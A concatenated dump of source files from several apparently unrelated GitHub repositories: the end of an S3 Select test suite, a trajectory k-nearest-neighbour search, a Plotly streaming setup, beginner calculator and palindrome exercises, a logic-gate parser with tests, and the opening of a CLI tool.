res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _7 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'forth="1,2,3,4",')
# return value contain comma{,}{"}, escape-rule{\} by-pass quote{"} , the escape{\} is removed.
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _8 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'fifth="my_string="any_value" , my_other_string="aaaa,bbb" ",')
# return NULL as first token
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _1 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL in the middle of line
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _3 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL in the middle of line (successive)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _4 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL at the end line
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _9 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
@attr('s3select')
def test_csv_definition():
number_of_rows = 10000
#create object with pipe-sign as field separator and tab as row delimiter.
csv_obj = create_random_csv_object(number_of_rows,10,"|","\t")
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
# purpose of tests is to parse correctly input with different csv defintions
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin;","|","\t") ).replace(",","")
nose.tools.assert_equal( number_of_rows, int(res))
# assert is according to radom-csv function
# purpose of test is validate that tokens are processed correctly
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)),max(int(_2)),min(int(_3))+1 from stdin;","|","\t") ).replace("\n","")
min_1 = min ( create_list_of_int( 1 , csv_obj , "|","\t") )
max_2 = max ( create_list_of_int( 2 , csv_obj , "|","\t") )
min_3 = min ( create_list_of_int( 3 , csv_obj , "|","\t") ) + 1
__res = "{},{},{},".format(min_1,max_2,min_3)
nose.tools.assert_equal( res_s3select, __res )
@attr('s3select')
def test_schema_definition():
number_of_rows = 10000
# purpose of test is to validate functionality using csv header info
csv_obj = create_random_csv_object(number_of_rows,10,csv_schema="c1,c2,c3,c4,c5,c6,c7,c8,c9,c10")
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
# ignoring the schema on first line and retrieve using generic column number
res_ignore = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _1,_3 from stdin;",csv_header_info="IGNORE") ).replace("\n","")
# using the scheme on first line, query is using the attach schema
res_use = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select c1,c3 from stdin;",csv_header_info="USE") ).replace("\n","")
# result of both queries should be the same
nose.tools.assert_equal( res_ignore, res_use)
# using column-name not exist in schema
res_multiple_defintion = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select c1,c10,int(c11) from stdin;",csv_header_info="USE") ).replace("\n","")
assert res_multiple_defintion.find("alias {c11} or column not exist in schema") > 0
# alias-name is identical to column-name
res_multiple_defintion = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(c1)+int(c2) as c4,c4 from stdin;",csv_header_info="USE") ).replace("\n","")
assert res_multiple_defintion.find("multiple definition of column {c4} as schema-column and alias") > 0
@attr('s3select')
def test_when_than_else_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select case when ((4*3)==(12)) than "case_1_2" else "case_2_1" end from stdin where (3*3==9);') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "case_1_2,")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select case when cast(_1 as int)>100 and cast(_1 as int)<200 than "(100-200)" when cast(_1 as int)>200 and cast(_1 as int)<300 than "(200-300)" else "NONE" end from s3object;') ).replace("\n","")
count1 = res_s3select.count("(100-200)")
count2 = res_s3select.count("(200-300)")
count3 = res_s3select.count("NONE")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)>100 and cast(_1 as int)<200 ;') ).replace("\n","")
res1 = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)>200 and cast(_1 as int)<300 ;') ).replace("\n","")
res2 = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)<=100 or cast(_1 as int)>=300 or cast(_1 as int)==200 ;') ).replace("\n","")
nose.tools.assert_equal( str(count1) + ',', res)
nose.tools.assert_equal( str(count2) + ',', res1)
nose.tools.assert_equal( str(count3) + ',', res2)
@attr('s3select')
def test_coalesce_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)>2 and char_length(_4)>2 and cast(substr(_3,1,2) as int) == cast(substr(_4,1,2) as int);') ).replace("\n","")
res_null = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>99 and cast(_4 as int)>99 and coalesce(nullif(cast(substr(_3,1,2) as int),cast(substr(_4,1,2) as int)),7) == 7;' ) ).replace("\n","")
nose.tools.assert_equal( res_s3select, res_null)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select coalesce(nullif(_5,_5),nullif(_1,_1),_2) from stdin;') ).replace("\n","")
res_coalesce = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select coalesce(_2) from stdin;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res_coalesce)
@attr('s3select')
def test_cast_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>999;') ).replace("\n","")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)>3;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>99 and cast(_3 as int)<1000;') ).replace("\n","")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)==3;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res)
@attr('s3select')
def test_version():
return
number_of_rows = 1
# purpose of test is to validate functionality using csv header info
csv_obj = create_random_csv_object(number_of_rows,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_version = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select version() from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_version, "41.a," )
``` |
{
"source": "Joke-Lin/IKNN-Experiment",
"score": 3
} |
#### File: Joke-Lin/IKNN-Experiment/iknn.py
```python
import numpy as np
import math
import random
import queue
import matplotlib.pyplot as plt
from quadTree import *
import preprocess
from knn import *
from createTrajectories import *
#查找每一个查询点的K临近点
def findKNN(Q:list,tree:QuadTree,K:int,datasetDict:dict):
res = []
for qi in Q:
#查找最临近的K个点
resi = knn(datasetDict[qi],K,tree,datasetDict)
res.append(resi)
return res
#随机生成一个查询序列,为临近的K个点
def generateQuery(K:int, tree:QuadTree,datasetDict:dict)->list:
begin = random.randint(0,tree.root.pointsNum-1)
#找最临近的另外两个点 加上初始点 作为查询点集合
res = knn(datasetDict[begin],K,tree,datasetDict)
return res
#查找查询点KNN点经过的轨迹
#第一个参数为列表的列表,每一个列表对应一个查询点qi的KNN点集
def findTrajectroy(points:list,point2tra:dict)->set:
#最后的所有轨迹并集
res = set()
for pp in points:#每一个查询点查找到的KNN点集
for p in pp: #每一个KNN点
#点不经过任何轨迹则跳过
if p not in point2tra:
continue
for ti in point2tra[p]:#点所经过的轨迹
res.add(ti)
return res
#计算已经扫描的轨迹的上界
#t:当前轨迹的key,points:查询点对应的KNN点集列表
def UB(t:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->float:
sum = 0
#对应查询点查询到的KNN点集
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
mindistance = 0xffffffff
for p in pp:#对每一个K临近点,判断是否经过t这条轨迹,如果经过则更新最短距离
#如果该点未经过任何轨迹则跳过
if p not in point2tra:
continue
#判断点是否经过当前轨迹
if isExist(point2tra[p],t):
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist < mindistance:
mindistance = curdist
#如果没有点经过当前轨迹,则计算距离最大的作为当前sim(qi,Rx),则当前的值一定大于真实值
#故为上界
if mindistance == 0xffffffff:
maxdistance = -100
for p in pp:#对每一个K临近点,直接算出其中距离最远的
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist > maxdistance:
maxdistance = curdist
sum += math.exp(-maxdistance)
else:
sum += math.exp(-mindistance)
return sum
#计算未扫描的轨迹的上界
def UBn(Query:list,points:list,datasetDict:dict)->float:
sum = 0
#对应查询点查询到的KNN点集
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
maxdistance = -100
for p in pp:#对每一个K临近点,直接算出其中距离最远的
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist > maxdistance:
maxdistance = curdist
sum += math.exp(-maxdistance)
return sum
#计算一条轨迹对于查询点的lower bound
#参数分别为:轨迹下标,轨迹到点的映射,点到轨迹的映射,查询点集,查询点的KNN集合
def LB(t:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->float:
sum = 0
#对应查询点查询到的KNN点集
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
mindistance = 0xffffffff
for p in pp:#对每一个K临近点,判断是否经过t这条轨迹,如果经过则更新最短距离
#如果该点未经过任何轨迹直接跳过
if p not in point2tra:
continue
#判断点是否经过当前轨迹
if isExist(point2tra[p],t):
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist < mindistance:
mindistance = curdist
#如果没有点经过当前轨迹,则不作改动
if mindistance == 0xffffffff:
sum += 0
else:
sum += math.exp(-mindistance)
return sum
#判断一个轨迹集合是否存在当前轨迹
def isExist(T:list,t:int)->bool:
for ti in T:
if ti == t:
return True
return False
#用于refine 函数 使用的元素类型
class K_BCT_element():
def __init__(self,t:int,Sim:float):
self.sim = Sim
self.t = t
def __lt__(self,other):
return self.sim < other.sim
#一组查询点 和 一条轨迹相似度
def Similarity(Q:list,T:list,datasetDict:dict):
sum = 0
for q in Q:
mindist = 0xffffffff
for pi in T:
curdist = euclidianDistance(datasetDict[q],datasetDict[pi])
if curdist < mindist:
mindist = curdist
sum += math.exp(-mindist)
return sum
#通过准确计算给出最终的结果集合
#C:待定的轨迹集合,
def refine(C:list,K:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->list:
# print('Candidates length:',len(C))
res = []
Candidates = []
#计算每一条轨迹的上界
for t in C:
Sim = UB(t,tra2point,point2tra,Query,points,datasetDict)
#加入到待定集合Candidates 方便后续排序使用
Candidates.append(K_BCT_element(t,Sim))
#按照UB 降序排序
Candidates = sorted(Candidates,key = lambda ele:ele.sim,reverse = True)
#遍历Candidates, UB 从大到小
for i in range(len(Candidates)):
#计算准确地相似度并更新
Sim_i = Similarity(Query,tra2point[Candidates[i].t],datasetDict)
Candidates[i].sim = Sim_i
#前K个轨迹不需要考虑
if i < K:
res.append(Candidates[i])
else:
#将备选的K个结果按升序排序,如果当前相似度大于了被选集中最小的则需要进行更新。
res.sort(key = lambda ele:ele.sim)
if Sim_i > res[0].sim:
res[0] = Candidates[i]
res.sort(key = lambda ele:ele.sim)#再次排序便于后一个判断使用
#如果当前已经是最后一个元素了,或者被备集中最小的相似度 都比 后一个元素的UB大,则不用继续判断(UB按照降序排列的)
if i == len(Candidates) - 1 or res[0].sim >= Candidates[i+1].sim:
#将最后的轨迹KEY保存为list 返回
result = []
for ele in res:
result.append(ele.t)
return result
result = []
for ele in res:
result.append(ele.t)
return result
#关键的incremental KNN 函数
#输入为查找点列表 和 要找的轨迹条数
def IKNN(Query:list,K:int,point2tra:dict,tra2point:dict,tree:QuadTree,datasetDict:dict)->list:
#每次增加查找的个数 以及KNN初始值
delta = len(Query)*K
y = delta
while True:
#查找KNN点集
points = findKNN(Query,tree,y,datasetDict)
#计算出待定的轨迹集
C = findTrajectroy(points,point2tra)
#对待定轨迹集合进行判断
if len(C) >= K:
#待定集合中每条轨迹的下界
Lowerbound = []
for t in C:
Lowerbound.append( LB(t,tra2point,point2tra,Query,points,datasetDict) )
#未扫描集合的上界
Upperbound = UBn(Query,points,datasetDict)
Lowerbound.sort()
#用列表切片K个最大的下界值
k_LB = Lowerbound[-K:]
#如果最小下界 比 上界都大,则不需要进行比较了
if k_LB[0] >= Upperbound:
#进行进一步准确计算得出最后的轨迹集合
K_BCT = refine(C,K,tra2point,point2tra,Query,points,datasetDict)
return K_BCT
#找到的轨迹条数不足K条,增加搜索的范围进一步查找
y = y + delta
class ForceItem():
def __init__(self,t:int,Sim:float):
self.sim = Sim
self.t = t
def __lt__(self,other):
return self.sim < other.sim
# 暴力遍历的 寻找最相似轨迹
def forceIKNN(Query:list, K:int, tra2point:dict, datasetDict:dict)->list:
res = queue.PriorityQueue()
for index,tra in tra2point.items():
sim = Similarity(Query,tra,datasetDict)
tempNode = ForceItem(index, sim)
if K > 0:
res.put(tempNode)
K = K - 1
else:
temp = res.get()
if tempNode.sim > temp.sim:
res.put(tempNode)
else:
res.put(temp)
resList = []
while not res.empty():
resList.append(res.get().t)
return resList
# 展示一个样例
def showOneExample(tra2point, point2tra, tree, datasetDict):
plt.figure(1)
dataSet = preprocess.readDataSet()
preprocess.drawPoints(dataSet)
for points in tra2point.values():
temp = [datasetDict[x] for x in points]
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=1, color="silver")
Query = generateQuery(10,tree,datasetDict)
K = 10
C = IKNN(Query, K, point2tra, tra2point,tree, datasetDict)
temp = []
for i in Query:
temp.append(datasetDict[i])
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=3,color='black')
for index in C:
points = tra2point[index]
temp = [datasetDict[x] for x in points]
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=2)
# 检测算法准确性 和 暴力对比
def testIKNNResultIsRight(tra2point, point2tra, tree, datasetDict):
K = 10
Query = generateQuery(10,tree,datasetDict)
C = forceIKNN(Query, K, tra2point, datasetDict)
C.sort()
print(C)
C = IKNN(Query, K, point2tra, tra2point,tree, datasetDict)
C.sort()
print(C)
# 检测不同IKNN以及暴力在不同查询数量上面的区别
def testDifferentIKNN(tra2point, point2tra, tree, datasetDict):
plt.figure(2)
x = range(1,150,3)
times = 3 # 设种情况测量times次
Query = generateQuery(10,tree,datasetDict)
# 首先是暴力
y = []
for k in x:
s = time()
for i in range(times):
forceIKNN(Query, k, tra2point, datasetDict)
e = time()
y.append((e-s)/times)
plt.plot(x, y, color="black", label="Force Search")
y = []
for k in x:
s = time()
for i in range(times):
IKNN(Query, k, point2tra, tra2point,tree, datasetDict)
e = time()
y.append((e-s)/times)
plt.plot(x, y, color="red", label="IKNN")
plt.xlabel("Search Trajectories' Number")
plt.ylabel("Average Time")
def main():
if not os.path.exists(preprocess.dataSetPath) and not os.path.exists(preprocess.newDataSetPath):
print("Error:","dataSetPath","not exist")
return
if not os.path.exists(preprocess.newDataSetPath):
preprocess.writeDataSetToFile()
if not os.path.exists(outfilep2tra) or not os.path.exists(outfiletra2p):
save()
tra2point, point2tra, tree, datasetDict = load()
testIKNNResultIsRight(tra2point, point2tra, tree, datasetDict)
# 一个样例的可视化
showOneExample(tra2point, point2tra, tree, datasetDict)
# 检测效率 时间过长默认注释
# testDifferentIKNN(tra2point, point2tra, tree, datasetDict)
plt.show()
if __name__ == "__main__":
main()
``` |
{
"source": "jokem59/Overwatch-Sentiment",
"score": 3
} |
#### File: jokem59/Overwatch-Sentiment/plotlySetup.py
```python
import plotly.plotly as py
import plotly.tools as tls
import plotly.graph_objs as go
import time
def setupPlotly(points):
'''
Sets up plotly graph to write to
:param points: <int> of max number of points to keep plotted on graph
:return: Plotly Stream object
'''
# Setup plotly
stream_ids = tls.get_credentials_file()['stream_ids']
# Get stream id from stream id list
stream_id = stream_ids[0]
# Make instance of stream id object
stream_1 = go.Stream(
token=stream_id, # link stream id to 'token' key
maxpoints=points # keep a max of 80 pts on screen
)
# Initialize trace of streaming plot by embedding the unique stream_id
trace1 = go.Scatter(
x=[],
y=[],
mode='lines',
stream=stream_1 # (!) embed stream id, 1 per trace
)
data = go.Data([trace1])
# Add title to layout object
layout = go.Layout(
title='Twitter Overwatch Sentiment',
xaxis=dict(
title='Date & Time',
titlefont=dict(
size=18,
color='#7f7f7f'
)
),
yaxis=dict(
title='Aggregate Sentiment',
titlefont=dict(
size=18,
color='#7f7f7f'
)
)
)
# Make a figure object
fig = go.Figure(data=data, layout=layout)
# Send fig to Plotly, initialize streaming plot, open new tab
py.iplot(fig, filename='python-streaming')
# We will provide the stream link object the same token that's associated with the trace we wish to stream to
stream_object = py.Stream(stream_id)
# We then open a connection
stream_object.open()
time.sleep(5)
return stream_object
``` |
{
"source": "JOkendo/PythonPrograms",
"score": 4
} |
#### File: JOkendo/PythonPrograms/globalcalc.py
```python
def help_screen():
print("A: Adds n and m\
S: Substracts n from m\
M: Multiplies n amd m\
D: Divides n and m\
H: Displays Helpscreen\
Q: Quits the program")
def menu():
return input("\
A: \
S: \
M: \
D: \
H: \
Q: \
")
results = 0.0
n = 0
m = 0
def get_input():
global n , m
n = int(input("Enter n: "))
m = int(input("Enter m: "))
def report():
print(results)
def add():
global results
results = n + m
def sub():
global results
if n > m:
results = n - m
results = n - m
def mul():
global results
results = n * m
def div():
global results
if m > 0:
results = n / m
def main():
done = False
while not done:
choice = menu()
if choice == 'A' or choice == 'a':
get_input()
add()
report()
elif choice == 'S' or choice == 's':
get_input()
sub()
report()
elif choice == 'M' or choice == 'm':
get_input()
mul()
report()
elif choice == 'D' or choice == 'd':
get_input()
div()
report()
elif choice == 'H' or choice == 'h':
help_screen()
elif choice == 'Q' or choice == 'q':
done = True
main()
```
#### File: JOkendo/PythonPrograms/GUICalc.py
```python
from tkinter import *
class GUICalc:
def __init__(self, v1, v2):
window = Tk()
window.title("GUI Calcutator")
frame1 = Frame(window)
frame1.pack()
self.v1 = IntVar()
entry = Entry(frame1, text = "Enter Number1", variable = self.v1, command = self.setV1 )
entry.pack()
window.mainloop()
def setV1(self, v1):
self.v1 = v1
def setV2(self, v2):
self.v2 = v2
def add(self):
result = self.v1 + self.v2
print("Sum = ", result)
return result
def sub(self):
if self.v2 < self.v1:
result = self.v1 - self.v2
print("Difference = ", result)
return result
else:
result1 = self.v2 - self.v1
print("Difference = ", result1)
return result1
def mul(self):
result = self.v1 * self.v2
print("Product = ", result)
return result
def divi(self):
if self.v2 > 0:
result = self.v1 / self.v2
print("Division = ", result)
return result
def mod(self):
result = self.v1 % self.v2
print("Remainder = ", result)
return result
def main():
calc = GUICalc(2, 3)
calc.add()
calc.sub()
calc.mul()
calc.divi()
calc.mod()
main()
``` |
{
"source": "JOkendo/pyTopical",
"score": 3
} |
#### File: pyTopical/iterations/iterativefact.py
```python
def factorial(n):
product = 1
while n:
product *= n
n -= 1
return product
def main():
print(factorial(10))
main()
```
#### File: pyTopical/strings/string.py
```python
import sys
def isPalindrome(s):
low = 0
high = len(s) - 1
while low < high:
if s[low] != s[high]:
return False
low += 1
high -= 1
return True
def main():
done = False
while not done:
an = input("Y or N: ")
if an == 'y':
s = input("Enter s: ").strip()
if isPalindrome(s):
print(s, " \"is a palindrome\" ")
else:
print(s, " \"is not a palindrome\" ")
elif an == 'n':
done = True
main()
```
#### File: pyTopical/tuples/arbitargs.py
```python
def sum(*num):
result = 0
for n in num:
result += n
return result
s = sum(*(2,3,4,5))
print(s)
tpl = 1,2,3,4,5,6,7
#Demostrate general unpacking; this also happens with lists
t, p, *rest = tpl
print(t)
print(p)
print(*rest) #Print just the list elements
``` |
{
"source": "JokeNeverSoke/logick",
"score": 4
} |
#### File: logick/logick/display.py
```python
from __future__ import annotations
def get_string_table(table: list[list[str]], headings: None | list[str] = None) -> str:
"""Consume table and create an ascii table
If no headings are provided, the heading row would not be printed.
Example return:
+---------+---------+
| a | b |
+---------+---------+
| 1 | 2 |
| i justd | 1231244 |
+---------+---------+
"""
# assume height is 1 for all rows
# get the needed width of each column
widths: list[int] = [0] * len(table[0])
for row in table:
for i, col in enumerate(row):
widths[i] = max(widths[i], len(col))
# also reference heading lengths
if headings:
for i, col in enumerate(headings):
widths[i] = max(widths[i], len(col))
# build the string
s: str = ""
horizontal_line = "+" + "".join(["-" * (w + 2) + "+" for w in widths]) + "\n"
s += horizontal_line
if headings is not None:
s += (
"|"
+ "".join(
[
" " + heading.ljust(widths[i]) + " |"
for i, heading in enumerate(headings)
]
)
+ "\n"
)
s += horizontal_line
for row in table:
s += "|"
for i, col in enumerate(row):
s += " " + col.ljust(widths[i] + 1) + "|"
s += "\n"
s += horizontal_line
return s
def pt(*args, **kwargs):
print(get_string_table(*args, **kwargs), end="")
```
#### File: logick/logick/gates.py
```python
class Gate:
def __init__(self):
pass
def __call__(self, *args) -> bool:
o = self.do(*args)
return o
def __repr__(self) -> str:
return "<Gate>"
def __str__(self):
return "<Gate>"
def __eq__(self, __o: object) -> bool:
raise NotImplementedError
def find_terminal_inputs(self) -> list["INPUT"]:
"""Find all terminal inputs, does not remove duplicates"""
raise NotImplementedError
def do(self, *args):
raise NotImplementedError
class OneGate(Gate):
a: Gate
def __repr__(self):
return f"<{type(self).__name__}({repr(self.a)})>"
def __str__(self):
return f"({type(self).__name__} {self.a})"
def __hash__(self) -> int:
return hash(f"gate-{type(self).__name__}-{hash(self.a)}")
def __eq__(self, __o: object) -> bool:
if not isinstance(__o, OneGate):
return False
if type(self) != type(__o):
return False
return self.a == __o.a
def find_terminal_inputs(self) -> list["INPUT"]:
return self.a.find_terminal_inputs()
class TwoGate(Gate):
a: Gate
b: Gate
def __repr__(self):
return f"<{type(self).__name__}({repr(self.a)}, {repr(self.b)})>"
def __str__(self):
return f"({self.a} {type(self).__name__} {self.b})"
def __hash__(self) -> int:
return hash(f"gate-{type(self).__name__}-{hash(self.a)}-{hash(self.b)}")
def __eq__(self, __o: object) -> bool:
if not isinstance(__o, TwoGate):
return False
if type(self) != type(__o):
return False
return (self.a == __o.a and self.b == __o.b) or (
self.a == __o.b and self.b == __o.a
)
def find_terminal_inputs(self) -> list["INPUT"]:
return self.a.find_terminal_inputs() + self.b.find_terminal_inputs()
class AND(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) and self.b(**kwargs)
class OR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) or self.b(**kwargs)
class NOT(OneGate):
def __init__(self, a: Gate):
super().__init__()
self.a = a
def do(self, **kwargs):
return not self.a(**kwargs)
class NAND(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return not (self.a(**kwargs) and self.b(**kwargs))
class NOR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return not (self.a(**kwargs) or self.b(**kwargs))
class XOR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) != self.b(**kwargs)
class INPUT(Gate):
def __init__(self, name: str):
super().__init__()
self.current: bool = False
self.name = name
def __repr__(self):
return f"<INPUT {self.name}>"
def __str__(self):
return self.name
def __hash__(self) -> int:
return hash(f"gate-input-{self.name}")
def __eq__(self, __o: object) -> bool:
return hash(self) == hash(__o)
def __lt__(self, __o: object) -> bool:
if not isinstance(__o, INPUT):
return False
return self.name < __o.name
def find_terminal_inputs(self) -> list["INPUT"]:
return [self]
def do(self, **kwargs):
return self.current
```
#### File: logick/logick/parse.py
```python
from __future__ import annotations
from lark import Lark, Transformer
from . import gates as g
from .controller import Controller
OPERATORS = {
"AND": g.AND,
"OR": g.OR,
"XOR": g.XOR,
"NOT": g.NOT,
"NAND": g.NAND,
"NOR": g.NOR,
}
PARSER = Lark(
r"""
?start: expression
expression: two_operation
| one_operation
| INPUT
| "(" expression ")"
two_operation: expression TWO_OPERATOR one_operation
| expression TWO_OPERATOR INPUT
| expression TWO_OPERATOR "(" expression ")"
one_operation: ONE_OPERATOR INPUT
| ONE_OPERATOR "(" expression ")"
ONE_OPERATOR: "NOT"
TWO_OPERATOR: "AND" | "OR" | "XOR" | "NAND" | "NOR"
INPUT: /[A-Z]/
%import common.WS
%ignore WS
""",
start="start",
)
class LogicTransformer(Transformer):
def INPUT(self, args: list[str]) -> g.INPUT:
name = args[0]
return g.INPUT(name)
def ONE_OPERATOR(self, args: str) -> g.Gate:
return OPERATORS[args]
def one_operation(self, args: tuple[type, g.Gate]) -> g.Gate:
return args[0](args[1])
def TWO_OPERATOR(self, args: str) -> g.Gate:
return OPERATORS[args]
def two_operation(self, args: tuple[g.Gate, type, g.Gate]) -> g.Gate:
return args[1](args[0], args[2])
def expression(self, args: tuple[g.Gate]) -> g.Gate:
return args[0]
def parse(statement: str):
"""Parse logic string into structured gate into list of gates
Inputs must be capital letters
"""
tree = PARSER.parse(statement)
tf = LogicTransformer()
out: g.Gate = tf.transform(tree)
return out
```
#### File: logick/logick/test_parse.py
```python
from .gates import *
from .parse import *
from .utils import inputs
def test_parsing():
A, B, Z = inputs("A B Z")
# inputs
assert parse("A") == A
assert parse("B") == B
assert parse("Z") == Z
# simple expressions
assert parse("A AND A") == AND(A, A)
assert parse("A NAND A") == NAND(A, A)
assert parse("A OR A") == OR(A, A)
assert parse("A NOR A") == NOR(A, A)
assert parse("A XOR A") == XOR(A, A)
assert parse("NOT A") == NOT(A)
# left recursion order
assert parse("A AND A OR A") == OR(AND(A, A), A)
assert parse("A AND (A OR A)") == AND(A, OR(A, A))
assert parse("A OR A AND (A)") == AND(OR(A, A), A)
assert parse("A OR (A AND A)") == OR(A, AND(A, A))
assert parse("NOT A AND B") == AND(NOT(A), B)
assert parse("NOT (A AND B)") == NOT(AND(A, B))
assert parse("A AND A AND A") == AND(AND(A, A), A)
assert parse("A AND A AND A AND A") == AND(AND(AND(A, A), A), A)
assert parse("A OR A OR A") == OR(OR(A, A), A)
assert parse("A OR A OR A OR A") == OR(OR(OR(A, A), A), A)
# super long expressions
assert parse("A AND (B XOR Z) OR (NOT A NAND B)") == OR(
AND(A, XOR(B, Z)), NAND(NOT(A), B)
)
assert parse("((((NOT A) NOR B) XOR A) AND B)") == AND(XOR(NOR(NOT(A), B), A), B)
def test_parse_tree():
(A,) = inputs("A")
u = parse("A AND A")
trace = Controller([u]).get_trace()
assert trace[{A: 0}] == {u: False}
assert trace[{A: 1}] == {u: True}
``` |
{
"source": "JokeNeverSoke/poets",
"score": 3
} |
#### File: poets/poetspy/generate.py
```python
import json
import os
import sys
from pathlib import Path
import click
@click.command(short_help="Change title")
@click.argument("title", nargs=-1, required=True)
def title(title):
"""Modify the title of the current structure in .poets.json"""
t = " ".join(title)
p = Path("./.poets.json")
if p.exists():
if p.is_dir():
click.secho(".poets.json is a directory!", fg="red")
sys.exit(1)
k = json.load(p.open())
k["title"] = t
else:
k = {"title": t}
json.dump(k, p.open("w"))
click.echo(
click.style("title set to", fg="blue")
+ " "
+ click.style(t, fg="blue", underline=True)
)
@click.command(short_help="Change description")
@click.argument("des", nargs=-1, required=True)
def des(des):
"""Modify the description of the current structure in .poets.json"""
t = " ".join(des)
p = Path("./.poets.json")
if p.exists():
if p.is_dir():
click.secho(".poets.json is a directory!", fg="red")
sys.exit(1)
k = json.load(p.open())
k["subtitle"] = t
else:
k = {"subtitle": t}
json.dump(k, p.open("w"))
click.echo(
click.style("description set to", fg="blue")
+ " "
+ click.style(t, fg="blue", underline=True)
)
@click.group()
def main():
"""Placeholder for subcommands"""
pass
main.add_command(title)
main.add_command(des)
if __name__ == "__main__":
main()
```
#### File: poets/poetspy/poets.py
```python
from __future__ import annotations
import json
import os
import re
import sys
import threading
from queue import Queue
from typing import Iterable, cast, TypedDict
import click
import marko
import marko.inline
import toml
from loguru import logger
LOGGING_LEVELS = [99, 50, 40, 30, 25, 20, 10, 5]
SOURCE_PACKAGE_JSON = "packageJson"
SOURCE_PROJECT_TOML = "pyprojectToml"
SOURCE_README_MD = "readmeMd"
SOURCE_README_RST = "readmeRst"
SOURCE_POETS_JSON = "poetsJson"
DESCRIPTION_SOURCE_PRIORITY = [
SOURCE_POETS_JSON,
SOURCE_PACKAGE_JSON,
SOURCE_PROJECT_TOML,
SOURCE_README_RST,
SOURCE_README_MD,
]
class Description(TypedDict):
title: str
subtitle: str
def file_to_string(path: str) -> str:
